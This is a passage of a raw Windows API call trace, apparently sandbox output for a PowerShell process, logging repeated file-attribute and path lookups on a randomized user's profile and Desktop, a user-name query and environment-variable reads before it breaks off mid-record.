[0027.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.316] GetLastError () returned 0xcb [0027.316] SetErrorMode (uMode=0x1) returned 0x1 [0027.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.316] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1cdff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.317] GetLastError () returned 0xcb [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\.", nBufferLength=0x105, lpBuffer=0x1cdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.317] GetLastError () returned 0xcb [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.317] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.317] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.317] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ce460 | out: lpFileInformation=0x1ce460*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.317] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.317] GetLastError () returned 0xcb [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1cdf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.317] GetLastError () returned 0xcb [0027.317] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1cdfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.317] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.317] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ce46c | out: lpFileInformation=0x1ce46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0027.317] GetLastError () returned 0xcb [0027.317] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1cdfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ce46c | out: lpFileInformation=0x1ce46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x233be580, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x233be580, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1ce000, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.318] GetLastError () returned 0xcb [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1cdf9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0027.318] GetLastError () returned 0xcb [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1cdfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x1ce46c | out: lpFileInformation=0x1ce46c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1cdfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR" (normalized: "c:\\users\\bgc6u8oy yxgxkr"), fInfoLevelId=0x0, lpFileInformation=0x1ce46c | out: lpFileInformation=0x1ce46c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x233be580, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x23db61a0, ftLastAccessTime.dwHighDateTime=0x1d2dbc2, ftLastWriteTime.dwLowDateTime=0x23db61a0, ftLastWriteTime.dwHighDateTime=0x1d2dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", nBufferLength=0x105, lpBuffer=0x1ce000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.318] GetLastError () returned 0xcb [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\.", nBufferLength=0x105, lpBuffer=0x1cdf9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR", lpFilePart=0x0) returned 0x18 [0027.318] GetLastError () returned 0xcb [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ce46c | out: lpFileInformation=0x1ce46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.318] GetLastError () returned 0xcb [0027.318] SetErrorMode (uMode=0x1) returned 0x1 [0027.318] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1cdfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.318] GetLastError () returned 0xcb [0027.319] SetErrorMode (uMode=0x1) returned 0x1 [0027.319] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ce46c | out: lpFileInformation=0x1ce46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.319] GetLastError () returned 0xcb [0027.319] SetErrorMode (uMode=0x1) returned 0x1 [0027.319] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1ce000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.319] GetLastError () returned 0xcb [0027.319] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1cdf9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.319] GetLastError () returned 0xcb [0027.335] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x1ce0bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0027.335] GetLastError () returned 0xcb [0027.335] SetErrorMode (uMode=0x1) returned 0x1 [0027.335] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2190f30 | out: lpFileInformation=0x2190f30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x3b95c310, ftLastAccessTime.dwHighDateTime=0x1d34280, ftLastWriteTime.dwLowDateTime=0x3b95c310, ftLastWriteTime.dwHighDateTime=0x1d34280, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0027.336] GetLastError () returned 0xcb [0027.336] SetErrorMode (uMode=0x1) returned 0x1 [0027.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.336] GetLastError () returned 0xcb [0027.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.336] GetLastError () returned 0xcb [0027.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.336] GetLastError () returned 0xcb [0027.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.336] GetLastError () returned 0xcb [0027.358] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2b6c80, nSize=0x1ce658 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x1ce658) returned 0x1 [0027.358] GetLastError () returned 0xcb [0027.358] GetUserNameW (in: lpBuffer=0x2b64c0, pcbBuffer=0x1ce660 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x1ce660) returned 1 [0027.358] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x21b1b90*="Available", lpRawData=0x21b1a4c) returned 1 [0027.359] GetLastError () returned 0x0 [0027.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.359] GetLastError () returned 0xcb [0027.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.360] GetLastError () returned 0xcb [0027.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.366] GetLastError () returned 0xcb [0027.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.366] GetLastError () returned 0xcb [0027.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.366] GetLastError () returned 0xcb [0027.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.368] GetLastError () returned 0xcb [0027.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.368] GetLastError () returned 0xcb [0027.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.368] GetLastError () returned 0xcb [0027.368] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0027.368] GetLastError () returned 0xcb [0027.368] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0027.368] GetLastError () returned 0xcb [0027.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.368] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetCurrentProcessId () returned 0xa50 [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.369] GetLastError () returned 0xcb [0027.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce078, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.370] GetLastError () returned 0xcb [0027.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce078, lpFilePart=0x0 | out: 